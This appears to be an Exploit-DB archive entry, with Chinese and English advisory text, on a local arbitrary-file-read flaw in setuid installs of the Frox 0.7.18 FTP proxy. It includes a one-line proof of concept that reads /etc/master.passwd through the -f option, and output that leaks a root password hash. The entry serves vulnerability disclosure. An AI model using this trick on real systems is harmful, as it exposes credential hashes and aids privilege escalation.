https://www.exploit-db.com/exploits/26218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-060

Frox是一个开源的FTP透明代理，工作在BSD和其他使用ipfilter的操作系统下。frox0.7.18，运行setuid根目录时，在读取配置文件时无法正确分配权限，这样本地用户就可以通过-f命令选项任意读取一部分文件。

source: http://www.securityfocus.com/bid/14711/info

Frox is prone to a vulnerability that permits read access to arbitrary files.

Successful exploitation of this vulnerability will grant the attacker read access to arbitrary files on the system in the security context of the Frox process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

It should be noted that this issue is only exploitable if Frox is installed with setuid or setgid privileges. 

mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file

来源:BID
名称:14711
链接:http://www.securityfocus.com/bid/14711
来源:BUGTRAQ
名称:20050901Filearibitaryreadaccessinfrox
链接:http://www.securityfocus.com/archive/1/409667